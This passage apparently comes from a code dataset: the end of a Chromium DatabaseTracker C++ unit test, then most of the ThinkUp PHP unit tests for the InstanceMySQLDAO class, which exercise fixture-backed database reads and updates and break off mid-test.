TEST(DatabaseTrackerTest, DatabaseTrackerIncognitoMode) {
  DatabaseTracker_TestHelper_Test::TestDatabaseTracker(true);
}
TEST(DatabaseTrackerTest, DatabaseTrackerQuotaIntegration) {
  // There is no difference in behavior between incognito and not.
  DatabaseTracker_TestHelper_Test::DatabaseTrackerQuotaIntegration();
}
TEST(DatabaseTrackerTest, DatabaseTrackerClearSessionOnlyDatabasesOnExit) {
  // Only works for regular mode.
  DatabaseTracker_TestHelper_Test::
      DatabaseTrackerClearSessionOnlyDatabasesOnExit();
}
TEST(DatabaseTrackerTest, DatabaseTrackerSetForceKeepSessionState) {
  // Only works for regular mode.
  DatabaseTracker_TestHelper_Test::DatabaseTrackerSetForceKeepSessionState();
}
TEST(DatabaseTrackerTest, EmptyDatabaseNameIsValid) {
  DatabaseTracker_TestHelper_Test::EmptyDatabaseNameIsValid();
}
TEST(DatabaseTrackerTest, HandleSqliteError) {
  DatabaseTracker_TestHelper_Test::HandleSqliteError();
}
} // namespace content
| geminy/aidear | oss/qt/qt-everywhere-opensource-src-5.9.0/qtwebengine/src/3rdparty/chromium/content/browser/database_tracker_unittest.cc | C++ | gpl-3.0 | 35,365 |
<?php
/**
*
* ThinkUp/tests/TestOfInstanceMySQLDAO.php
*
* Copyright (c) 2009-2015 Gina Trapani, Guillaume Boudreau, Christoffer Viken, Mark Wilkie
*
* LICENSE:
*
* This file is part of ThinkUp (http://thinkup.com).
*
* ThinkUp is free software: you can redistribute it and/or modify it under the terms of the GNU General Public
* License as published by the Free Software Foundation, either version 2 of the License, or (at your option) any
* later version.
*
* ThinkUp is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
* warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
* details.
*
* You should have received a copy of the GNU General Public License along with ThinkUp. If not, see
* <http://www.gnu.org/licenses/>.
*
*
* @author Gina Trapani <ginatrapani[at]gmail[dot]com>
* @author Guillaume Boudreau <gboudreau[at]pommepause[dot]com>
* @author Christoffer Viken <christoffer[at]viken[dot]me>
* @author Mark Wilkie <mark[at]bitterpill[dot]org>
* @license http://www.gnu.org/licenses/gpl.html
* @copyright 2009-2015 Gina Trapani, Guillaume Boudreau, Christoffer Viken, Mark Wilkie
*/
require_once dirname(__FILE__).'/init.tests.php';
require_once THINKUP_WEBAPP_PATH.'_lib/extlib/simpletest/autorun.php';
require_once THINKUP_WEBAPP_PATH.'config.inc.php';
class TestOfInstanceMySQLDAO extends ThinkUpUnitTestCase {
protected $DAO;
/**
 * Set up each test: initialize the DAO under test and insert the
 * instance/owner_instance fixtures built by buildData().
 */
public function setUp() {
    parent::setUp();
    $this->DAO = new InstanceMySQLDAO();
    // Keep builder references alive so the fixture rows persist for the test.
    $this->builders = $this->buildData();
}
/**
 * Build the shared fixture set used by most tests:
 * - Twitter instances: jack (id 1, active, private, stalest crawl 1988),
 *   jill (id 2, active, private, freshest crawl), stuart (id 3, inactive,
 *   public).
 * - Facebook instances: Jillian Dickerson (id 4, active, public),
 *   Paul Clark (id 5, inactive, public).
 * - Owner 2 owns instances 1 and 2; instance 1 carries an auth error.
 * @return array FixtureBuilder objects (rows are deleted when these fall
 *               out of scope)
 */
protected function buildData() {
    $builders = array();
    $builders[] = FixtureBuilder::build('instances', array('network_user_id'=>10, 'network_username'=>'jack',
    'network'=>'twitter', 'network_viewer_id'=>10, 'crawler_last_run'=>'1988-01-20 12:00:00', 'is_active'=>1,
    'is_public'=>0, 'posts_per_day'=>11, 'posts_per_week'=>77));
    $builders[] = FixtureBuilder::build('instances', array('network_user_id'=>12, 'network_username'=>'jill',
    'network'=>'twitter', 'network_viewer_id'=>12, 'crawler_last_run'=>'2010-01-20 12:00:00', 'is_active'=>1,
    'is_public'=>0, 'posts_per_day'=>11, 'posts_per_week'=>77));
    $builders[] = FixtureBuilder::build('instances', array('network_user_id'=>13, 'network_username'=>'stuart',
    'network'=>'twitter', 'network_viewer_id'=>13, 'crawler_last_run'=>'2010-01-01 12:00:00', 'is_active'=>0,
    'is_public'=>1, 'posts_per_day'=>11, 'posts_per_week'=>77));
    $builders[] = FixtureBuilder::build('instances', array('network_user_id'=>15,
    'network_username'=>'Jillian Dickerson', 'network'=>'facebook', 'network_viewer_id'=>15,
    'crawler_last_run'=>'2010-01-01 12:00:01', 'is_active'=>1, 'is_public'=>1, 'posts_per_day'=>11,
    'posts_per_week'=>77));
    $builders[] = FixtureBuilder::build('instances', array('network_user_id'=>16, 'network_username'=>'Paul Clark',
    'network'=>'facebook', 'network_viewer_id'=>16, 'crawler_last_run'=>'2010-01-01 12:00:02', 'is_active'=>0,
    'is_public'=>1, 'posts_per_day'=>11, 'posts_per_week'=>77));
    $builders[] = FixtureBuilder::build('owner_instances', array('owner_id'=>2, 'instance_id'=>1,
    'auth_error'=>"There has been an error."));
    $builders[] = FixtureBuilder::build('owner_instances', array('owner_id'=>2, 'instance_id'=>2,
    'auth_error'=>''));
    return $builders;
}
/**
 * Tear down: drop the builder references so FixtureBuilder destructors
 * remove the fixture rows, then run the parent cleanup.
 */
public function tearDown() {
    $this->builders = null;
    parent::tearDown();
}
/**
 * delete() should remove an existing instance, reporting one affected row,
 * and report zero affected rows when no matching instance exists.
 */
public function testDeleteInstance() {
    // The fixture instance must exist before deletion.
    $existing = $this->DAO->getByUsernameOnNetwork('jack', 'twitter');
    $this->assertNotNull($existing);

    // Deleting it affects exactly one row...
    $this->assertEqual($this->DAO->delete('jack', 'twitter'), 1);
    // ...after which the instance can no longer be looked up.
    $this->assertNull($this->DAO->getByUsernameOnNetwork('jack', 'twitter'));

    // Deleting a nonexistent instance affects zero rows.
    $this->assertEqual($this->DAO->delete('idontexist', 'somenonexistentnetwork'), 0);
}
/**
 * get() should hydrate an Instance by primary key and return null for an
 * unknown id.
 */
public function testGet() {
    $instance = $this->DAO->get(1);
    $this->assertIsA($instance, 'Instance');
    // Spot-check the hydrated fields against the jack fixture.
    $expected_fields = array(
        'id' => 1,
        'network_user_id' => 10,
        'network_username' => 'jack',
        'network' => 'twitter'
    );
    foreach ($expected_fields as $field => $expected_value) {
        $this->assertEqual($instance->$field, $expected_value);
    }

    // An id with no row yields null.
    $this->assertNull($this->DAO->get(100));
}
/**
 * getHoursSinceLastCrawlerRun() should report the age of the stalest
 * *active* instance's last crawl, ignoring inactive instances.
 */
public function testGetHoursSinceLastCrawlerRun() {
    $dao = new InstanceMySQLDAO();
    // Deactivate every fixture instance so only the builders below count.
    foreach (range(1, 5) as $instance_id) {
        $dao->setActive($instance_id, 0);
    }

    $builders = array();
    // One active instance crawled 3 hours ago.
    $builders[] = FixtureBuilder::build('instances', array('crawler_last_run'=>'-3h', 'is_active'=>1));
    $this->assertEqual($dao->getHoursSinceLastCrawlerRun(), 3);

    // A fresher active instance does not change the stalest age.
    $builders[] = FixtureBuilder::build('instances', array('crawler_last_run'=>'-2h', 'is_active'=>1));
    $this->assertEqual($dao->getHoursSinceLastCrawlerRun(), 3);

    // An inactive instance is ignored entirely.
    $builders[] = FixtureBuilder::build('instances', array('crawler_last_run'=>'-1h', 'is_active' => 0));
    $this->assertEqual($dao->getHoursSinceLastCrawlerRun(), 3);
}
/**
 * insert() should create a new instance row and return its id; the network
 * defaults to twitter and the viewer id defaults to the user id unless an
 * explicit viewer id is passed.
 */
public function testInsert() {
    // Defaults: twitter network, viewer id mirrors the user id.
    $inserted_id = $this->DAO->insert(11, 'ev');
    $this->assertEqual($inserted_id, 6);
    $instance = $this->DAO->getByUserIdOnNetwork(11, 'twitter');
    $this->assertEqual($instance->network_user_id, 11);
    $this->assertEqual($instance->network_viewer_id, 11);
    $this->assertEqual($instance->network_username, 'ev');
    $this->assertEqual($instance->network, 'twitter');

    // Explicit network and viewer id.
    $inserted_id = $this->DAO->insert(14, 'The White House Facebook Page', 'facebook', 10);
    $this->assertEqual($inserted_id, 7);
    $instance = $this->DAO->getByUserIdOnNetwork(14, 'facebook');
    $this->assertEqual($instance->network_user_id, 14);
    $this->assertEqual($instance->network_viewer_id, 10);
    $this->assertEqual($instance->network_username, 'The White House Facebook Page');
    $this->assertEqual($instance->network, 'facebook');
}
/**
 * getFreshestByOwnerId() should return the owner's most recently crawled
 * instance, or null for an owner with no instances.
 */
public function testGetFreshestByOwnerId(){
    // julie was crawled 1 day ago -- fresher than owner 2's fixture
    // instances (jack 1988, jill 2010-01-20... relative to the test DB).
    // NOTE(review): this builder sets 'is_activated' while the sibling
    // fixtures in buildData() use 'is_active' -- verify against the
    // instances table schema that this is the intended column.
    $instance_builder = FixtureBuilder::build('instances', array('network_username'=>'julie',
    'network'=>'twitter', 'crawler_last_run'=>'-1d', 'is_activated'=>'1', 'is_public'=>'1'));
    $owner_instance_builder = FixtureBuilder::build('owner_instances', array(
    'instance_id'=>$instance_builder->columns['last_insert_id'], 'owner_id'=>'2'));
    //try one
    $instance = $this->DAO->getFreshestByOwnerId(2);
    $this->assertIsA($instance, "Instance");
    $this->assertEqual($instance->id, $instance_builder->columns['last_insert_id']);
    $this->assertEqual($instance->network_username, 'julie');
    $this->assertEqual($instance->network_user_id, $instance_builder->columns['network_user_id']);
    $this->assertEqual($instance->network_viewer_id, $instance_builder->columns['network_viewer_id']);
    //Try a non existent one
    $result = $this->DAO->getFreshestByOwnerId(3);
    $this->assertNull($result);
}
/**
 * The freshest/stalest single-instance getters should pick the instance
 * with the newest/oldest crawler_last_run (optionally restricted to public
 * instances), and return null when the table is empty.
 */
public function testGetInstanceOneByLastRun(){
    //Try Newest: jill has the most recent crawler_last_run (2010-01-20).
    $result = $this->DAO->getInstanceFreshestOne();
    $this->assertIsA($result, "Instance");
    $this->assertEqual($result->network_username, 'jill');
    $this->assertEqual($result->network_user_id, 12);
    $this->assertEqual($result->network_viewer_id, 12);
    //Try Newest Public: Paul Clark is the freshest of the public fixtures.
    $result = $this->DAO->getInstanceFreshestPublicOne();
    $this->assertIsA($result, "Instance");
    $this->assertEqual($result->network_username, 'Paul Clark');
    $this->assertEqual($result->network_user_id, 16);
    $this->assertEqual($result->network_viewer_id, 16);
    //Try Oldest: jack's 1988 crawl is the stalest.
    $result = $this->DAO->getInstanceStalestOne();
    $this->assertIsA($result, "Instance");
    $this->assertEqual($result->network_username, 'jack');
    $this->assertEqual($result->network_user_id, 10);
    $this->assertEqual($result->network_viewer_id, 10);
    // Empty the instances table directly to exercise the no-rows path.
    // (TRUNCATE bypasses the fixture builders; tearDown's cleanup of the
    // already-removed rows is harmless.)
    $config = Config::getInstance();
    $config_array = $config->getValuesArray();
    $q = "TRUNCATE TABLE " . $config_array['table_prefix'] . "instances ";
    PDODAO::$PDO->exec($q);
    //Try empty
    $result = $this->DAO->getInstanceStalestOne();
    $this->assertNull($result);
}
/**
 * getByUsername() should hydrate the matching Instance and return null for
 * an unknown username.
 */
public function testGetByUsername() {
    // username => array(network_user_id, network_viewer_id)
    $expected = array(
        'jill' => array(12, 12),
        'jack' => array(10, 10),
    );
    foreach ($expected as $username => $ids) {
        $instance = $this->DAO->getByUsername($username);
        $this->assertIsA($instance, "Instance");
        $this->assertEqual($instance->network_username, $username);
        $this->assertEqual($instance->network_user_id, $ids[0]);
        $this->assertEqual($instance->network_viewer_id, $ids[1]);
    }

    // An unknown username yields null.
    $this->assertNull($this->DAO->getByUsername('no one'));
}
/**
 * getByUserIdOnNetwork() should hydrate the matching Instance and return
 * null when no instance exists for the given user id on that network.
 */
public function testGetByUserId() {
    // A known user id on twitter resolves to jack's instance.
    $instance = $this->DAO->getByUserIdOnNetwork(10, 'twitter');
    $this->assertIsA($instance, "Instance");
    $this->assertEqual($instance->network_username, 'jack');
    $this->assertEqual($instance->network_user_id, 10);
    $this->assertEqual($instance->network_viewer_id, 10);

    // An unknown user id yields null.
    $this->assertNull($this->DAO->getByUserIdOnNetwork(11, 'twitter'));
}
/**
 * getAllInstances($order = "DESC", $only_active = false, $network = "twitter")
 * should honor the sort order, the active-only flag, and the network filter.
 *
 * The five scenarios below previously repeated the same verification loop
 * verbatim; it is factored into assertInstanceList() to keep the expected
 * orderings readable side by side.
 */
public function testGetAllInstances(){
    // Default: twitter, all instances, freshest crawler_last_run first.
    $result = $this->DAO->getAllInstances();
    $this->assertInstanceList($result, array('jill','stuart','jack'),
        array(12,13,10), array(12,13,10));

    // Ascending order: stalest crawl first.
    $result = $this->DAO->getAllInstances("ASC");
    $this->assertInstanceList($result, array('jack','stuart','jill'),
        array(10,13,12), array(10,13,12));

    // Ascending, active only: stuart (inactive) is excluded.
    $result = $this->DAO->getAllInstances("ASC", true);
    $this->assertInstanceList($result, array('jack','jill'),
        array(10,12), array(10,12));

    // Ascending, facebook network.
    $result = $this->DAO->getAllInstances("ASC", false, 'facebook');
    $this->assertInstanceList($result, array('Jillian Dickerson','Paul Clark'),
        array(15,16), array(15,16));

    // Ascending, active-only facebook: only Jillian Dickerson is active.
    $result = $this->DAO->getAllInstances("ASC", true, 'facebook');
    $this->assertInstanceList($result, array('Jillian Dickerson'),
        array(15), array(15));
}

/**
 * Assert $instances is an array of Instance objects whose usernames,
 * network user ids, and network viewer ids match the expected parallel
 * arrays, in order.
 * @param mixed $instances  Value returned by the DAO (asserted to be array)
 * @param array $usernames  Expected network_username values, in order
 * @param array $user_ids   Expected network_user_id values, in order
 * @param array $viewer_ids Expected network_viewer_id values, in order
 */
private function assertInstanceList($instances, array $usernames, array $user_ids, array $viewer_ids) {
    $this->assertIsA($instances, "array");
    $this->assertEqual(count($instances), count($usernames));
    foreach ($instances as $index => $instance) {
        $this->assertIsA($instance, "Instance");
        $this->assertEqual($instance->network_username, $usernames[$index]);
        $this->assertEqual($instance->network_user_id, $user_ids[$index]);
        $this->assertEqual($instance->network_viewer_id, $viewer_ids[$index]);
    }
}
/**
 * getByOwner() should return every instance for an admin owner, only the
 * owner's own instances when $force_not_admin is true or the owner is not
 * an admin, and an empty array for an owner with no instances.
 */
public function testGetByOwner(){
    $data = array(
    'id'=>2,
    'user_name'=>'steven',
    'full_name'=>'Steven Warren',
    'email'=>'me@example.com',
    'last_login'=>'Yesterday',
    'is_admin'=>1,
    'is_activated'=>1,
    'failed_logins'=>0,
    'account_status'=>''
    );
    $owner = new Owner($data);
    // Test is-admin: an admin sees all 5 fixture instances.
    $result = $this->DAO->getByOwner($owner);
    $this->assertIsA($result, "array");
    $this->assertEqual(count($result), 5);
    $users = array('jill','Paul Clark','Jillian Dickerson','stuart','jack');
    $uID = array(12,16,15,13,10);
    $vID = array(12,16,15,13,10);
    foreach($result as $id=>$i){
        $this->assertIsA($i, "Instance");
        $this->assertEqual($i->network_username, $users[$id]);
        $this->assertEqual($i->network_user_id, $uID[$id]);
        $this->assertEqual($i->network_viewer_id, $vID[$id]);
    }
    // Test Is Admin - Forced Not: only the 2 instances owner 2 owns.
    $result = $this->DAO->getByOwner($owner, true);
    $this->assertIsA($result, "array");
    $this->assertEqual(count($result), 2);
    $users = array('jill','jack');
    $uID = array(12,10);
    $vID = array(12,10);
    foreach($result as $id=>$i){
        $this->assertIsA($i, "Instance");
        $this->assertEqual($i->network_username, $users[$id]);
        $this->assertEqual($i->network_user_id, $uID[$id]);
        $this->assertEqual($i->network_viewer_id, $vID[$id]);
    }
    // Test not admin: same restriction applies for a non-admin owner.
    $owner->is_admin = false;
    $result = $this->DAO->getByOwner($owner);
    $this->assertIsA($result, "array");
    $this->assertEqual(count($result), 2);
    $users = array('jill','jack');
    $uID = array(12,10);
    $vID = array(12,10);
    foreach($result as $id=>$i){
        $this->assertIsA($i, "Instance");
        $this->assertEqual($i->network_username, $users[$id]);
        $this->assertEqual($i->network_user_id, $uID[$id]);
        $this->assertEqual($i->network_viewer_id, $vID[$id]);
    }
    $owner->id = 3;
    //Try empty: owner 3 owns no instances.
    $result = $this->DAO->getByOwner($owner);
    $this->assertIsA($result, "array");
    $this->assertEqual(count($result), 0);
}
/**
 * getByOwnerWithStatus() should return the owner's instances along with the
 * auth_error recorded on each owner_instances row.
 */
public function testGetByOwnerWithStatus(){
    $owner = new Owner(array(
        'id'=>2,
        'user_name'=>'steven',
        'full_name'=>'Steven Warren',
        'email'=>'me@example.com',
        'last_login'=>'Yesterday',
        'is_admin'=>1,
        'is_activated'=>1,
        'failed_logins'=>0,
        'account_status'=>''
    ));

    $instances = $this->DAO->getByOwnerWithStatus($owner);
    $this->assertIsA($instances, "array");
    $this->assertEqual(count($instances), 2);

    $expected_usernames = array('jack', 'jill');
    $expected_user_ids = array(10, 12);
    foreach ($instances as $index => $instance) {
        $this->assertIsA($instance, "Instance");
        $this->assertEqual($instance->network_username, $expected_usernames[$index]);
        $this->assertEqual($instance->network_user_id, $expected_user_ids[$index]);
        // Only jack's instance (user id 10) carries the fixture auth error.
        if ($instance->network_user_id == 10) {
            $this->assertEqual($instance->auth_error, 'There has been an error.');
        } else {
            $this->assertEqual($instance->auth_error, '');
        }
    }
}
/**
 * getByOwnerAndNetwork() should filter by network, respect the admin /
 * forced-not-admin / non-admin visibility rules, honor the active-only
 * flag, and return an empty array for an owner with no instances.
 *
 * Fix: removed a stray double semicolon after the final DAO call.
 */
public function testGetByOwnerAndNetwork(){
    $data = array(
    'id'=>2,
    'user_name'=>'steven',
    'full_name'=>'Steven Warren',
    'email'=>'me@example.com',
    'last_login'=>'Yesterday',
    'is_admin'=>1,
    'is_activated'=>1,
    'failed_logins'=>0,
    'account_status'=>''
    );
    $owner = new Owner($data);
    // Test is-admin twitter: all three twitter fixture instances.
    $result = $this->DAO->getByOwnerAndNetwork($owner, 'twitter');
    $this->assertIsA($result, "array");
    $this->assertEqual(count($result), 3);
    $users = array('jill','stuart','jack');
    $uID = array(12,13,10);
    $vID = array(12,13,10);
    foreach($result as $id=>$i){
        $this->assertIsA($i, "Instance");
        $this->assertEqual($i->network_username, $users[$id]);
        $this->assertEqual($i->network_user_id, $uID[$id]);
        $this->assertEqual($i->network_viewer_id, $vID[$id]);
    }
    // Test is-admin twitter, active only
    $result = $this->DAO->getByOwnerAndNetwork($owner, 'twitter', true, true);
    $this->assertIsA($result, "array");
    $this->assertEqual(count($result), 2); //jill and jack active, stuart is not
    $users = array('jill','jack');
    $uID = array(12,10);
    $vID = array(12,10);
    foreach($result as $id=>$i){
        $this->assertIsA($i, "Instance");
        $this->assertEqual($i->network_username, $users[$id]);
        $this->assertEqual($i->network_user_id, $uID[$id]);
        $this->assertEqual($i->network_viewer_id, $vID[$id]);
    }
    // Test is-admin facebook: both facebook fixture instances.
    $result = $this->DAO->getByOwnerAndNetwork($owner, 'facebook');
    $this->assertIsA($result, "array");
    $this->assertEqual(count($result), 2);
    $users = array('Paul Clark','Jillian Dickerson');
    $uID = array(16,15);
    $vID = array(16,15);
    foreach($result as $id=>$i){
        $this->assertIsA($i, "Instance");
        $this->assertEqual($i->network_username, $users[$id]);
        $this->assertEqual($i->network_user_id, $uID[$id]);
        $this->assertEqual($i->network_viewer_id, $vID[$id]);
    }
    // Test is-admin Twitter, forced not: only owner 2's own instances.
    $result = $this->DAO->getByOwnerAndNetwork($owner, 'twitter', true);
    $this->assertIsA($result, "array");
    $this->assertEqual(count($result), 2);
    $users = array('jill','jack');
    $uID = array(12,10);
    $vID = array(12,10);
    foreach($result as $id=>$i){
        $this->assertIsA($i, "Instance");
        $this->assertEqual($i->network_username, $users[$id]);
        $this->assertEqual($i->network_user_id, $uID[$id]);
        $this->assertEqual($i->network_viewer_id, $vID[$id]);
    }
    // Test not admin twitter: same restriction for a non-admin owner.
    $owner->is_admin = false;
    $result = $this->DAO->getByOwnerAndNetwork($owner, 'twitter');
    $this->assertIsA($result, "array");
    $this->assertEqual(count($result), 2);
    $users = array('jill','jack');
    $uID = array(12,10);
    $vID = array(12,10);
    foreach($result as $id=>$i){
        $this->assertIsA($i, "Instance");
        $this->assertEqual($i->network_username, $users[$id]);
        $this->assertEqual($i->network_user_id, $uID[$id]);
        $this->assertEqual($i->network_viewer_id, $vID[$id]);
    }
    $owner->id = 3;
    //Try empty: owner 3 owns no instances.
    $result = $this->DAO->getByOwnerAndNetwork($owner, 'twitter');
    $this->assertIsA($result, "array");
    $this->assertEqual(count($result), 0);
}
public function testSetPublic(){
    // Flip jack's instance (id 1) to public; exactly one row should change.
    $this->assertEqual($this->DAO->setPublic(1, true), 1, "Count UpdateToTrue (%s)");
    // Reload from the database to confirm the flag really persisted.
    $jack = $this->DAO->getByUsername('jack');
    $this->assertEqual($jack->network_username, 'jack');
    $this->assertEqual($jack->network_user_id, 10);
    $this->assertTrue($jack->is_public);

    // Flip it back to private and verify again via a fresh load.
    $this->assertEqual($this->DAO->setPublic(1, false), 1, "Count UpdateToFalse (%s)");
    $jack = $this->DAO->getByUsername('jack');
    $this->assertEqual($jack->network_username, 'jack');
    $this->assertEqual($jack->network_user_id, 10);
    $this->assertFalse($jack->is_public);
}
public function testSetActive(){
    // Deactivate jack's instance (id 1); exactly one row should change.
    $this->assertEqual($this->DAO->setActive(1, false), 1, "Count UpdateToFalse (%s)");
    // Reload from the database to confirm the flag really persisted.
    $jack = $this->DAO->getByUsername('jack');
    $this->assertEqual($jack->network_username, 'jack');
    $this->assertEqual($jack->network_user_id, 10);
    $this->assertFalse($jack->is_active);

    // Reactivate it and verify again via a fresh load.
    $this->assertEqual($this->DAO->setActive(1, true), 1, "Count UpdateToTrue (%s)");
    $jack = $this->DAO->getByUsername('jack');
    $this->assertEqual($jack->network_username, 'jack');
    $this->assertEqual($jack->network_user_id, 10);
    $this->assertTrue($jack->is_active);
}
public function testSave(){
    // Builds a randomized data set around user 'jack' (id 10): ~250 posts
    // (some mentioning @jack/@jill, some replies, some with links) and
    // ~150 follows, then saves jack's instance and verifies the per-user
    // stats the DAO computed. The counters below track how many generated
    // rows belong to jack so expectations can be asserted afterwards.
    //First we need to generate some more TestData(tm)
    //First in line is some posts 250 Randomly generated ones, some with mentions.
    $mentions = 0;
    $posts = 0;
    $replies = 0;
    $links = 0;
    $builders = array();
    for($i=0; $i <= 250; $i++){
        $sender = rand(5,16);
        $data = 'asdf qwerty flakes meep';
        // Draw post ids until one is unused; $pic records ids seen so far.
        $post_id = rand(1000, 1000000);
        while(isset($pic[$post_id])){
            $post_id = rand(1000, 1000000);
        }
        $pic[$post_id] = true;
        // $number (1..8) drives mention/reply/link variation and pub_date.
        $number = rand(1,8);
        if ($number == 1 or $number == 2){
            $data = "@jack ".$data;
            $mentions++;
        }
        elseif ($number == 3){
            $data = "@jill ".$data;
        }
        // Even draws become replies to user 11; count jack's replies.
        if ($number % 2 == 0) {
            $reply_to = '11';
            if ($sender == 10){
                $replies++;
            }
        } else {
            $reply_to = 'NULL';
        }
        $builders[] = FixtureBuilder::build('posts', array('id'=>$post_id, 'post_id'=>$post_id,
            'author_user_id'=>$sender, 'post_text'=>$data, 'pub_date'=>'-'.$number.'h',
            'in_reply_to_user_id'=>$reply_to));
        if ($sender == 10){
            $posts++;
        }
        // Odd draws also attach a link row to the post.
        if ($number % 2 == 1) {
            $builders[] = FixtureBuilder::build('links', array('url'=>$data, 'post_key'=>$post_id));
            if ($sender == 10){
                $links++;
            }
        }
    }
    unset($pic);
    //Then generate some follows
    $follows = 0;
    for($i=0; $i<= 150; $i++){
        $follow = array("follower"=>rand(5,25), "following"=>rand(5,25));
        // Only insert unseen follower/following pairs ($fd is the seen-set);
        // on a duplicate, decrement $i so this iteration is retried with a
        // fresh random pair.
        if (!isset($fd[$follow['following']."-".$follow['follower']])){
            $fd[$follow['following']."-".$follow['follower']] = true;
            $builders[] = FixtureBuilder::build('follows', array('user_id'=>$follow['following'],
                'follower_id'=>$follow['follower']));
            if ($follow['following'] == 10){
                $follows++;
            }
        }
        else{
            $i = $i-1;
        }
    }
    //Lastly generate some users
    $users = array(
        array('id'=>10, 'user_name'=>'jack'),
        array('id'=>12, 'user_name'=>'jill'),
        array('id'=>13, 'user_name'=>'stuart'),
        array('id'=>15, 'user_name'=>'Jillian Dickerson'),
        array('id'=>16, 'user_name'=>'Paul Clark')
    );
    foreach($users as $user){
        $builders[] = FixtureBuilder::build('users', $user);
    }
    //Now load the instance in question
    $i = $this->DAO->getByUsername('jack');
    //Edit it.
    $i->last_post_id = 512;
    $i->is_archive_loaded_follows = 1;
    $i->is_archive_loaded_replies = 1;
    //First make sure that last run data is correct before we start.
    $result = $this->DAO->getInstanceFreshestOne();
    $this->assertIsA($result, "Instance");
    $this->assertEqual($result->network_username, 'jill');
    $this->assertEqual($result->network_user_id, 12);
    $this->assertEqual($result->network_viewer_id, 12);
    //Save it
    $count = $this->DAO->save($i, 1024);
    $this->assertEqual($count, 1);
    //Load it for testing
    $result = $this->DAO->getByUsername('jack');
    $this->assertEqual($result->total_posts_by_owner, 1024);
    $this->assertEqual($result->last_post_id, 512);
    $this->assertNull($result->total_replies_in_system);
    $this->assertEqual($result->total_follows_in_system, $follows);
    $this->assertEqual($result->total_posts_in_system, $posts);
    $this->assertTrue($result->is_archive_loaded_follows);
    $this->assertTrue($result->is_archive_loaded_replies);
    //Check if it is the update updated last Run.
    $result = $this->DAO->getInstanceFreshestOne();
    $this->assertIsA($result, "Instance");
    $this->assertEqual($result->network_username, 'jack');
    $this->assertEqual($result->network_user_id, 10);
    $this->assertEqual($result->network_viewer_id, 10);
    // Check if the stats were correctly calculated and saved
    // post per are limited to a max of 25, see getInstanceUserStats()
    $posts_per = ($posts > 25) ? 25 : $posts;
    // $this->assertEqual(round($result->posts_per_day), $posts_per);
    $this->assertEqual($result->posts_per_week, $posts_per);
    $this->assertEqual($result->percentage_replies, round($replies / $posts * 100, 2));
    $this->assertEqual($result->percentage_links, round($links / $posts * 100, 2));
    //Still needs tests for:
    //earliest_reply_in_system
    //earliest_post_in_system
}
public function testSaveNoPosts(){
    // Seed only the user row -- deliberately no posts at all.
    $builders = array();
    $builders[] = FixtureBuilder::build('users', array('id'=>10, 'user_name'=>'jack'));
    $instance = $this->DAO->getByUsername('jack');
    // Saving an instance that has zero posts must not emit PHP warnings;
    // the test harness fails this test if any warning is generated here.
    $this->DAO->save($instance, 1024);
}
public function testUpdateLastRun(){
    // Sanity-check the freshest instance before touching anything: the
    // seeded data has jill (id 12) as most recently crawled.
    $freshest = $this->DAO->getInstanceFreshestOne();
    $this->assertIsA($freshest, "Instance");
    $this->assertEqual($freshest->network_username, 'jill');
    $this->assertEqual($freshest->network_user_id, 12);
    $this->assertEqual($freshest->network_viewer_id, 12);

    // Perform the update on instance 1 and confirm exactly one row changed.
    $this->assertEqual($this->DAO->updateLastRun(1), 1);

    // Instance 1 (jack) should now be the freshest.
    $freshest = $this->DAO->getInstanceFreshestOne();
    $this->assertIsA($freshest, "Instance");
    $this->assertEqual($freshest->network_username, 'jack');
    $this->assertEqual($freshest->network_user_id, 10);
    $this->assertEqual($freshest->network_viewer_id, 10);
}
public function testIsUserConfigured(){
    // A seeded twitter instance owner should report as configured.
    $this->assertTrue($this->DAO->isUserConfigured("jack", "twitter"));
    // An unknown user/network combination should not.
    $this->assertFalse($this->DAO->isUserConfigured("no one", "facebook"));
}
public function testIsInstancePublic(){
    // jack's instance is seeded as private.
    $this->assertFalse($this->DAO->isInstancePublic("jack", "twitter"));
    // stuart's instance is flagged public.
    $this->assertTrue($this->DAO->isInstancePublic("stuart", "twitter"));
    // A nonexistent instance is treated as not public.
    $this->assertFalse($this->DAO->isInstancePublic("no one", "facebook"));
}
public function testGetByUserAndViewerId() {
    $this->DAO = new InstanceMySQLDAO();
    // Initialize the fixture list; the original appended to an undefined
    // variable, which raises an E_NOTICE under strict error reporting.
    $builders = array();
    $builders[] = FixtureBuilder::build('instances', array('network_user_id'=>17,
        'network_username'=>'Jillian Micheals', 'network'=>'facebook', 'network_viewer_id'=>15,
        'crawler_last_run'=>'2010-01-01 12:00:01', 'is_active'=>1));
    // Twitter instance seeded by the fixture setup.
    $result = $this->DAO->getByUserAndViewerId(10, 10, 'twitter');
    $this->assertEqual($result->network_username, 'jack');
    // Facebook instance created above, looked up by user + viewer id.
    $result = $this->DAO->getByUserAndViewerId(17, 15, 'facebook');
    $this->assertEqual($result->network_username, 'Jillian Micheals');
}
public function testGetByViewerId() {
    $this->DAO = new InstanceMySQLDAO();
    // Initialize the fixture list; the original appended to an undefined
    // variable, which raises an E_NOTICE under strict error reporting.
    $builders = array();
    $builders[] = FixtureBuilder::build('instances', array('network_user_id'=>17,
        'network_username'=>'Jillian Micheals', 'network'=>'facebook', 'network_viewer_id'=>15,
        'crawler_last_run'=>'2010-01-01 12:00:01', 'is_active'=>1));
    // Viewer 15 should match both the seeded instance and the one above.
    $result = $this->DAO->getByViewerId(15);
    $this->assertEqual($result[0]->network_username, 'Jillian Dickerson');
    $this->assertEqual($result[1]->network_username, 'Jillian Micheals');
}
public function testGetByUsernameOnNetwork() {
    $this->DAO = new InstanceMySQLDAO();
    // Initialize the fixture list; the original appended to an undefined
    // variable, which raises an E_NOTICE under strict error reporting.
    $builders = array();
    // Same username on two distinct networks to prove the network filter works.
    $builders[] = FixtureBuilder::build('instances', array('network_user_id'=>17,
        'network_username'=>'salma', 'network'=>'facebook', 'network_viewer_id'=>15,
        'crawler_last_run'=>'2010-01-01 12:00:01', 'is_active'=>1));
    $builders[] = FixtureBuilder::build('instances', array('network_user_id'=>18,
        'network_username'=>'salma', 'network'=>'facebook page', 'network_viewer_id'=>15,
        'crawler_last_run'=>'2010-01-01 12:00:01', 'is_active'=>1));
    $result = $this->DAO->getByUsernameOnNetwork('salma', 'facebook');
    $this->assertEqual($result->network_username, 'salma');
    $this->assertEqual($result->network, 'facebook');
    $this->assertEqual($result->network_user_id, 17);
    $result = $this->DAO->getByUsernameOnNetwork('salma', 'facebook page');
    $this->assertEqual($result->network_username, 'salma');
    $this->assertEqual($result->network, 'facebook page');
